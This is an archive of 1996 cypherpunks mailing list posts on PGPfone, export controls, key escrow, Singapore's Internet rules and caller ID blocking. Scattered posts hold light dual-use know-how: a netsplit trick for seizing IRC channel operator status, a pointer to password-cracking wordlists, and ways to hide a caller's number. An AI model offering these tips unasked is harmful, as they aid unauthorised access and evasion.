> rather, could I prevent them from finding out? 


Arun:

I can't give you a definitive answer here, but I'll take a shot.  
Most Internet telephony systems use UDP packets to transfer speech, 
since the lower overhead of UDP (as opposed to TCP) allows for better 
throughput.      I assume (but I'm not certain) that PGPfone works 
the same way.

Unfortunately, most of your other TCP/IP communication will be based 
on TCP packets.  Therefore, it's theoretically possible for your ISP 
to monitor your traffic, watching for large numbers of UDP packets.  



---------------
Harry Hochheiser           harry@tigger.jvnc.net
08 3A B5 F6 47 7F C7 C4 28 B4 8D D2 2E DF F6 1E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry Hochheiser" <harry@tigger.jvnc.net>
Date: Sun, 14 Jul 1996 04:09:07 +0800
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
Message-ID: <199607131509.AA14392@tigger.jvnc.net>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Jul 96 at 21:31, Arun Mehta wrote:

> At 23:38 10/07/96 -0700, Will Price wrote:
> >ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
> 
> Sorry if this has been discussed before (please point me in the
> right direction if that is the case), but VSNL, my government-owned
> ISP (which also has a monopoly on all international traffic) made me
> sign that I will not use my Internet connection for voice traffic.
> Is there any way they could find out if I were using PGPfone, or
> rather, could I prevent them from finding out? 


Arun:

I can't give you a definitive answer here, but I'll take a shot.  
Most Internet telephony systems use UDP packets to transfer speech, 
since the lower overhead of UDP (as opposed to TCP) allows for better 
throughput.      I assume (but I'm not certain) that PGPfone works 
the same way.

Unfortunately, most of your other TCP/IP communication will be based 
on TCP packets.  Therefore, it's theoretically possible for your ISP 
to monitor your traffic, watching for large numbers of UDP packets.  
While a large amount of UDP traffic wouldn't _prove_ that you were 
using Internet telephony, they might _assume_ that the UDP traffic 
was voice traffic.  It all depends on how sophisticated and 
heavy-handed they wanted to be about it.

Now, I don't know if PGPfone uses UDP.  However, if it did, it would 
be as easy to detect as any other Internet telephony product.  An 
encrypted bunch of UDP bits is as easy to spot as an un-encrypted 
bunch, even if the contents can't be interpreted.

I hope this helps.  If any of this content is incorrect, my 
apologies.

-Harry



---------------
Harry Hochheiser           harry@tigger.jvnc.net
08 3A B5 F6 47 7F C7 C4 28 B4 8D D2 2E DF F6 1E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 14 Jul 1996 04:18:18 +0800
To: Lyal Collins <lyalc@ozemail.com.au>
Subject: Re: Reasonable validation of a software package
In-Reply-To: <31E87985.6EF9@ozemail.com.au>
Message-ID: <Pine.SUN.3.94.960713113105.16336B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


This illustrates the need for and role of certification authorities.

See http://www.law.miami.edu/~froomkin/articles/trusted.htm  for some
info.

On Sat, 13 Jul 1996, Lyal Collins wrote:

> This touches upon a favourite rant of mine.
[...]
> So, now you need to ensure that you can get your public key 
> (to verify the digital signature with) in the hands of all 
> your possible, or intended, recipients. 
> 
> Now the race is on for as many people as possible to generate 
> PGP public keys/certificates bearing your name, or variations 
> of it. Once that occurs, there is a fair chance that one of 
> these keys will verfiy the digital signature on a piece of
> software purportedly from you. Still, not many people will have 
> your true PGP public key/certificate, but, them's the breaks.

[...]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sun, 14 Jul 1996 04:39:51 +0800
To: hal@MIT.EDU
Subject: Re: MIT harassed over publication of PGP book
Message-ID: <199607131534.LAA17389@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal,

	would such review have any material effect on MIT behavior?

	I appreciate the point about the sneakiness of the State Dept.
However, I can't imagine publication of the next PGP source (or whatever)
to be funded by Sandia.  I would also hope they would have no fingers into
any crypto research.  Prior review of crypto research publications is what
Adm. Inman wanted back in 1978, in response to which both Cryptologia and
ICAR were founded (from my POV).  MIT was a strong force in backing NSA
down on its attempt to get prior review of publications and I'd hate to see
them knuckle under in any way on this point.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Sun, 14 Jul 1996 04:51:39 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Internet Relay Chat
In-Reply-To: <199607131004.MAA16866@basement.replay.com>
Message-ID: <Pine.SCO.3.93.960713113231.1663B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jul 1996, Anonymous wrote:

> Is it legal to hack IRC???
> 
> Just wondering..

Try it and find out.  Please let us know how it goes.  BTW, when..., uh, I
mean, "if" you get busted, please don't hesitate to call upon the
Cypherpunks Prisoner Dialogue and Support Service.  It's a little
something we've set up here at c'punks for folks just like yourselves whom
we are loathe to see imprisoned for something so trite as stealing ops on
public communications channels, reading/changing private communications
(yes, IRC can go 'private'), and forging other people's IDs.  We supply
underwear, cigarettes, and rubbers (never know when you're gonna become
someone's 'boy', now do ya?) as well as pen-pals from around the country.

Enjoy your IRC hacking experience!

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 13 Jul 1996 22:11:22 +0800
To: cypherpunks@toad.com
Subject: Internet Relay Chat
Message-ID: <199607131004.MAA16866@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Is it legal to hack IRC???

Just wondering..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 14 Jul 1996 05:09:41 +0800
To: "sfuze@sunspot.tiac.net>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SUN.3.91.960713001239.14285A-100000@sunspot.tiac.net>
Message-ID: <rogerenmgjcb0.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Millie" == sfuze@tiac net <sfuze@sunspot.tiac.net> writes:

  > Here's how you STOP the 800 people from getting your number:

  > DIAL THE OPERATOR and have her put the call through...

Or place the call with your cellular phone -- AFAIK, CLID and ANI
information doesn't get passed along on cell phone calls.

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Sun, 14 Jul 1996 06:42:48 +0800
To: cypherpunks@toad.com
Subject: Re: A case for 2560 bit keys
Message-ID: <199607131655.MAA19369@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sat Jul 13 12:51:36 1996
> On Thu, 11 Jul 1996, Chris Adams wrote:
> 
> > check your setup. I used to run a 386-20 (5MB RAM) and it took about
>  3
> > seconds for a 1024 bit key. Given it didn't even have a copro (not
>  sure
> > when/if PGP uses one) and that it was off of a Stackered drive, I'd
> > expect you to have much better times.
> 
> That's consistent with the timings I've been getting.  It should take
>  about
> 9 seconds to decrypt an arbitrary message with a 2048-bit key with the
>  setup
> you describe.  Of course, I usually use X, so that probably does throw
>  off
> the timings a bit.
> 

This is an issue that is connected with the "Need PGP awareness" thread.  
If everyone is decrypting their messages by hand then nine seconds is a 
hinderance.  On the other hand, if everyone is using an off-line reader 
that checks signatures/decrypts as it receives messages then nine seconds 
(or less for a newer machine) is less significant.

I'll refrain from making any product plugs here, but I could barely notice 
the difference moving from a 1024 bit key to a 2047 bit key.

- --
David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMefUGeSLhCBkWOspAQGuPgf+I2A0a3F6OeBMA9MGUp0ww13Xiq3+LdS4
pOEvhz7Ub1tBUcl5Ko8/y/7pIZE1pZom0fOoyDOD9HX9OrHrY7sDkKbDY2sirfEl
dovFKKImIJaMzxDgKhxAdlrmrLq/xrz2rAXv9FvA/KSkCJys/A7ydu9AprKA7Esf
E6qRDmQFuuTcNvEVC5WOoDLVQoNZQUe1gVs97YFYFabTMA0bXr8bI/RdHcFy8vIj
51jBSI3Ib2WgcGOa2dKrmU7TRMQk5UHGGxKuKGGgIaOZ4uvPVUmNwHVg9wADbnzX
fjkZBvk8/sIqvD4Z4rHWulpHVJxCgKHzVgsh7exCVoZlffITu0SHqw==
=kHRX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 13 Jul 1996 23:07:17 +0800
To: Will Rodger <rodger@interramp.com>
Subject: Re: I@Week on crypto export loophole 6/24/96
In-Reply-To: <1.5.4.32.19960712190524.00663184@pop3.interramp.com>
Message-ID: <31E7828B.391B18B0@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Will Rodger wrote:
> 
>  The odds the US would go after a foreign company would seem pretty remote,
> unless based in a country that strongly suppported US policy.

Er, right ... Just like they don't go after the Swiss bankers who
choose to have dealings with Columbians, or German businessmen who
have dealings with Cubans ...

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William \"Bud\" Kennedy" <bkennedy@nb.net>
Date: Sun, 14 Jul 1996 06:00:34 +0800
To: cypherpunks@toad.com
Subject: Singapore
Message-ID: <Pine.3.89.9607131356.B9032-0100000@platinum.nb.net>
MIME-Version: 1.0
Content-Type: text/plain


   SINGAPORE (ITN) * Singapore announced rules Thursday  aimed  at  blocking
anti-government views and pornography on the Internet, adding to the thicket
of laws that regulate books, movies and public discussion here.
   But authorities insisted the latest rules -- one of the first attempts by
any country to screen the Internet -- do not amount to censorship.
   The  government  will  hand  out  annual  licenses  to  Singapore's three
Internet providers, as well as to political parties that maintain Web sites,
groups and individuals who run discussion sites on  politics  and  religion,
and on-line newspapers.
   Beginning  Monday,  these  groups  will  be  responsible for blocking out
material deemed objectionable by the government.  Violations will result  in
licenses being revoked.
   "We are not censoring discussion groups.  By registering these groups, we
are asking that they behave responsibly," said  the  Singapore  Broadcasting
Authority, a governmental regulatory body.
   The  free-wheeling  global  computer  link  up has provided the Singapore
government a major dilemma.
   Singapore promotes the Internet as part of its objective to make the city
of 3 million people the hub of high-tech industry.  One in three homes has a
computer,  and the number of Internet accounts doubled last year to 100,000.
A government plan calls for connecting each home to a  computer  network  by
2000.
   But  the Internet has also brought into Singapore what the government had
successfully kept out for years -- criticism of the administration  and  the
judiciary, pornography and discussions on race and religion.
   About  10  SBA  officials  will  surf  the  net  daily  for objectionable
material.  A government-appointed panel of prominent  citizens  will  decide
what  is  objectionable,  said  Goh  Liang  Kwang,  chief  executive  of the
Broadcasting Authority.
   But he admitted that even with regulations,  the  SBA  cannot  completely
police the Internet.
   "We  don't  claim  we  can  regulate  the  Internet.  We  just don't want
objectionable material to be easily available. We want to keep our immediate
neighborhood clean," said Goh.
   Still, a lot of rules remain vague.  Although political parties will need
   licenses, it is not clear if individual
politicians would be allowed  to  post  anti-government  views  on  bulletin
boards.  The  SBA  guidelines  say  it will not allow contents that "tend to
bring the government into hatred or contempt,  or which excite  disaffection
against  the  government." The definition of hatred or contempt has not been
spelled out.
   The government will also ban: -- contents that jeopardize public security
   or national defense.  -- anything  that  ridicules  racial  or  religious
   groups.  --  the  promotion  of religious deviations or occult practices.
   -- the "gross exploitation" of violence,  nudity,  sex or horror.  -- the
   depiction  of  "sexual perversions" such as homosexuality.  All these are
   already banned from books, magazines, newspapers, movies and
public forums.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 14 Jul 1996 06:38:37 +0800
To: cypherpunks@toad.com
Subject: Dep. AG Gorelick on CSPAN2 advocating escrow
Message-ID: <199607131751.NAA13385@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Saw Jamie(?) Gorelick, Dep. Attny Gen. on CSPAN2 talking about needs 
for key escrow. Emphasized the what if people lose their keys, or 
someone dies, or if an employee steals company secrets & encrypts 
them... rather than the usual what if terrorists use crypto line 
(though she did mention that too).

Guess they're taking a new tack to sell it to the public.  A lot of 
bunkum... (project left to the reader how these can be handled in a 
non-GAK manner).

Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rsc.anu.edu.au>
Date: Sat, 13 Jul 1996 16:49:37 +0800
To: cypherpunks@toad.com
Subject: EFA attitude to crypto
Message-ID: <199607130349.UAA15303@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Just to clear up Rich Grave's comment regarding the Electronic
Frontiers Australia's attitude to crypto.

EFA did not object the the ABA's report and it's comment about
crypto. They did object to an earlier government report which
said that crypto should be *mandatory* - since turning people
into criminals for transmitting plaintext is just as daft as
turning them into criminals for transmitting encrypted text.

Hope this puts things straight.

Sherry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 14 Jul 1996 07:42:11 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <199607131822.OAA13918@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Jul 96 at 18:23, Bob Palacios posted:

[Banner Snipped!]]
>  CDT POLICY POST Volume 2, Number 27                        July 12, 1996
[..]

> Today's statement is essentially a re-statement of the Clipper III proposal
> released in May.  Among other things, the Vice President:
> 
> *  Called for the liberalization of export controls provided computer
>    users participate in a "global key management infrastructure"
>    designed to make personal encryption keys accessible to law
>    enforcement.

This is particularly problematic... if the mainland Chinese gov't 
requested a key from a N.Amercian or European (or even UN controlled) 
escrow agency, who is to say it isn't really for political reasons 
(even though they may claim the persons are drug smugglers)?

Or what if the 'crime' was, say, discussing Mormon beliefs, which is 
illegal in Singapore (and I think Russia as well)?

Or what if some terrorist was using keys escrowed in a country that 
sponsered terrorist acts?  

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 14 Jul 1996 07:27:07 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Can the inevitability of Software privacy be used to defeat the ITAR?
In-Reply-To: <Pine.SUN.3.94.960712211853.13922F-100000@viper.law.miami.edu>
Message-ID: <199607131808.OAA10339@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: 
: Hey folks, let's be real clear about this
: 
: 
: The ITAR do NOT apply to books.
: 
: Repeat
: 
: 
: The ITAR do NOT apply to books.

The only trouble with this claim is that it does not conform to the
language of the ITAR or with the whimsical practices of the Office of
Defense Trade Controls.  There is no exception for books, except for
those that are in the public domain because they are sold in book stores
and at newstands or are found in libraries, and the ODT insists that one
cannot put a book into the public domain by putting it into the public
domain or by selling it in a bookstore.

 
: State told Karn that it did not have jurisdiction over books.

Not quite.  They decided in their unreviewable discretion that they
would not exercise jurisdiction over a particular book, but such
decisions are made on a case by case basis, based on no established
criteria, and are without any precedental value.  In fact, in some of
the material filed in the Karn case the representative of the ODT said
that waiving jurisdiction over that book of software may have been a
mistake, and that in the future they might have to come to a different
decision.

In the Karn case the ODT did make a distinction between a book and a
CDrom; but that it what makes their decision nonsensical.  The only
problem was that the decision was held to be unreviewable.

: "The ITAR do not apply to books"

They do to.  (Unless one takes the position, which the ODT would not
agree with, that the ITAR do not apply to the means of communicating
information.)

That's why they violate the first amendment.

Or is the idea that they only apply to articles?  (That would
certainly give a new meaning to the phrase ``defense articles''.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 14 Jul 1996 08:15:37 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Execution of signed scripts received by e-mail
In-Reply-To: <199607131520.IAA06868@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9607131438.B1219-0100000@dal1820>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jul 1996, Hal wrote:

> That sounds very impressive!  The one problem I've run into with mail

It's not new.  I wrote a similar thing for executing shell scripts for EDS
in 1986, except that I didn't have the means to digitally sign the email,
so I put a header "X-Password:" with a password in it.  Since the email
was only going over a UUCP link, I felt pretty safe about it.  Since the
EDS machine (a Sun 2!) was calling me, that was the only way I had to
execute commands and get results back.  It was written in C, by the way,
for a variety of reasons, even though perl was available (I am not a perl
fan). 
--
Ed Carp, N7EKG  	ecarp@pobox.com	214/993-3935 voicemail/digital pager
**   WeatherWatch, a division of Disaster Services - Garland, TX   **
Owner: WeatherAlert, DSOUTH-L backup, Shamanism mailing lists





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sun, 14 Jul 1996 08:19:10 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: ANI Blocking! Fast, Easy, Effective! (fwd)
In-Reply-To: <Pine.LNX.3.94.960713141046.240B-100000@gak>
Message-ID: <Pine.BSI.3.91.960713141207.357A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jul 1996, Mark M. wrote:

> On Fri, 12 Jul 1996, Bruce M. wrote:
> >     I thought this might be of interest due of the recent discussions 
> > about ANI and privacy.  I've seen this type of service before, but this 
> > one is apparently free (besides the cost of calling their area code if 
> > you aren't local).
> 
> It might be cheaper to use a pre-paid phone card.  However, the company that
> issues the card has access to your ANI information.

    Why not increase your level of precaution and use your pre-paid phone 
card to dial the number that ripco advertised and then dial out from 
there?
                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 14 Jul 1996 07:31:04 +0800
To: "Bruce M." <bkmarsh@feist.com>
Subject: Re: ANI Blocking! Fast, Easy, Effective! (fwd)
In-Reply-To: <Pine.BSI.3.91.960712234003.18385A-100000@wichita.fn.net>
Message-ID: <Pine.LNX.3.94.960713141046.240B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 12 Jul 1996, Bruce M. wrote:

>     I thought this might be of interest due of the recent discussions 
> about ANI and privacy.  I've seen this type of service before, but this 
> one is apparently free (besides the cost of calling their area code if 
> you aren't local).

It might be cheaper to use a pre-paid phone card.  However, the company that
issues the card has access to your ANI information.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMefngrZc+sv5siulAQGKPgQAppm3fXzKLzgxlJMzSp+gzS568RKC4CS2
5yBfy0R8homXYdOsH/xGMFYqFgtzCb339DagJnh9n4yNU1NFPcALQJfE9bXk0yMv
mqxBR8kzFwp1qFqTnamhsnP+ICvGPMTL68upPDq7hlze7OQ1ny5g8mz0zYEqFvVf
KtvixB+0FK0=
=7OUD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sun, 14 Jul 1996 08:15:27 +0800
To: cypherpunks@toad.com
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SUN.3.91.960713073643.20814A-100000@crl9.crl.com>
Message-ID: <Pine.BSI.3.91.960713141314.357B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jul 1996, Sandy Sandfort wrote:

> In response to which Bruce M. wrote:
> 
> > It would still be possible for the LD company to just pass
> > through your information for ANI, although I wonder what
> > percentage actually do.
> 
> Not being technically oriented, I may be venturing into deep
> water here, but I don't think ANI "pass through" is likely at
> all.  When you use a pre-paid calling card, TWO separate calls
> and call set-ups are made, your call to the card company and
> the card companies call to your ultimate destination.  While 
> many (most?) card companies keep records of all calls placed,
> there are some who keep no records at all.  Unless this
> hypothetical "pass through" capability is somehow built into 
> the the phone infrastructure and is transparent to the card 
> companies, I seriously doubt the card companes would invest any
> resources in doing such a "pass through."  After all, the same
> information is available, albeit with a bit more work, from 
> their operational logs if they even keep those.

    I'm not positive, but I think that there may be some standards on 
what types of signals and information that they must pass through.  I 
don't know that ANI signals would be among those, but I know that LD 
companies have been 'encouraged' for quite some time to pass on 
the information.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 14 Jul 1996 07:39:45 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: SECURE + PGP
In-Reply-To: <1.5.4.32.19960713131322.008c41f8@193.246.3.200>
Message-ID: <Pine.LNX.3.94.960713141656.240D-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 13 Jul 1996, Remo Pini wrote:

> I played around with secure (eudora plugin) a little bit, but it seems to be
> unable to decrypt anything it encrypted. (eudora 16-bit on winnt 4.0) Any hints?
> 
> Also, I wan't to write a mail-program (like eudora), with built-in PGP. Is
> the algorithm published anywhere (including the protocols)?
> 
> ie.: key generation, signing, en- and de-crypting, u.s.w.
> 
> I presume the algorithms are of the shelf (DES and IDEA), but what about the
> hash-algorithms and key-ring management?

All of the details are in the source code and the file pgformat.doc.  Good
luck writing the mail program.  Including PGP will probably be the easy part.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMefo67Zc+sv5siulAQGP/gP/THURBvEIXUdxWs7Tm4giJVUMU7MjEJYF
N8xmVXLJLUkxYpKqWRWNH8VptlrI+NiYmRux7D4X8fw+fK9IyOvEpdMjDTBc9JsI
mx+HqoS6Fp6vIUxMJDFnK/x9AKGVok6sb7iubEIuWuEeorJL/znuqNsiY4m0yBhX
StnbhlNO/ho=
=8FgF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sun, 14 Jul 1996 07:43:27 +0800
To: nobody@replay.com
Subject: Re: Internet Relay Chat
Message-ID: <960713143834_433497999@emout14.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


welllllllll all, It really depends on what you do.
Hacking IRC can be determined as hacking OPS in a channel... which I can see
NO legal frontier in which it crosses. Its more of a battle of wits.
Something as simple as finding a server disconnected from the net....making
that channel there...and waiting for it to rejoin the net was used to hack
OPS on a channel. Now.. that can be something done purely by accident..not
realizing the server isnt fully hooked up at the time.
 Regards,
              Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sun, 14 Jul 1996 01:31:02 +0800
To: cypherpunks@toad.com
Subject: SECURE + PGP
Message-ID: <1.5.4.32.19960713131322.008c41f8@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


I played around with secure (eudora plugin) a little bit, but it seems to be
unable to decrypt anything it encrypted. (eudora 16-bit on winnt 4.0) Any hints?

Also, I wan't to write a mail-program (like eudora), with built-in PGP. Is
the algorithm published anywhere (including the protocols)?

ie.: key generation, signing, en- and de-crypting, u.s.w.

I presume the algorithms are of the shelf (DES and IDEA), but what about the
hash-algorithms and key-ring management?

----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gmiller@dey-systems.com (Greg Miller)
Date: Sun, 14 Jul 1996 04:20:08 +0800
To: "Sentiono Leowinata" <sentiono@cycor.ca>
Subject: Re: Good dictionary files?
In-Reply-To: <199607130216.XAA15487@bud.peinet.pe.ca>
Message-ID: <31e7c648.8537112@pop.mis.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jul 96 23:21:51 -0400, you wrote:

>As many people say, a good password cracker is very dependent on the
>dictionary file(s). When one has a very good dictionary file(s), the
>chances of password being cracked is bigger. I am wondering if
>someone can tell me where I can get good dictionary file(s). Search
>on the web result to nothing. I have one large dictionary file (about
>14Mb) to check it, but I still not feel comfortable to say it's a
>good one. 

	Apparenlty you missed the ranting and raving only a few days ago (over
100 messages on the subject).

	There are several wordlists available at 
ftp://sable.ox.ac.uk/pub/wordlists

begin 644 tagline.txt
enum MicrosoftBoolean {TRUE, FALSE, MAYBE};
Greg Miller: Programmer/Analyst (gmiller@dey-systems.com)
http://grendel.ius.indiana.edu/~gmiller/
end.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sfuze@tiac.net" <sfuze@sunspot.tiac.net>
Date: Sun, 14 Jul 1996 08:38:39 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SUN.3.91.960713073643.20814A-100000@crl9.crl.com>
Message-ID: <Pine.SUN.3.91.960713164442.13725A-100000@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Re: Prepaid Calling Cards --

This might work with some telemarketing companies, but I certainly 
wouldn't be passing on anything of worth.

Especially something which might be construed as "wrong" by any legal 
authorities.

While I doubt any telemarketers would go to such great lengths to find 
out who you are, you are indeed passing along a nice dossier of numbers 
to whomever the calling card company chooses to disburse such info to.


Be wary.

And for godsakes, if you are that paranoid, use a payphone 50 miles away.

I'd never use a cellular to place a call of importance anyway.

We all know how easily cellular can be intercepted, I hope...  And EVERY 
number you ever call on a cellular is logged too.

Quid pro quo,
Millie





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mikhail A. Sokolov" <mishania@demos.su>
Date: Sun, 14 Jul 1996 01:38:37 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Internet Relay Chat
In-Reply-To: <199607131004.MAA16866@basement.replay.com>
Message-ID: <199607131340.RAA02043@megillah.demos.su>
MIME-Version: 1.0
Content-Type: text


As legal as in case you hack someone's machine.
Anyhow it depends on what did you mean by your question, though,
is there any legalized hack ?
> Is it legal to hack IRC???
> 
> Just wondering..
> 
> 

-mishania




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 14 Jul 1996 12:15:43 +0800
To: Steffen Zahn <zahn@berlin.snafu.de>
Subject: Re: Execution of signed scripts received by e-mail
In-Reply-To: <199607131624.SAA01131@zahn.berlin.snafu.de>
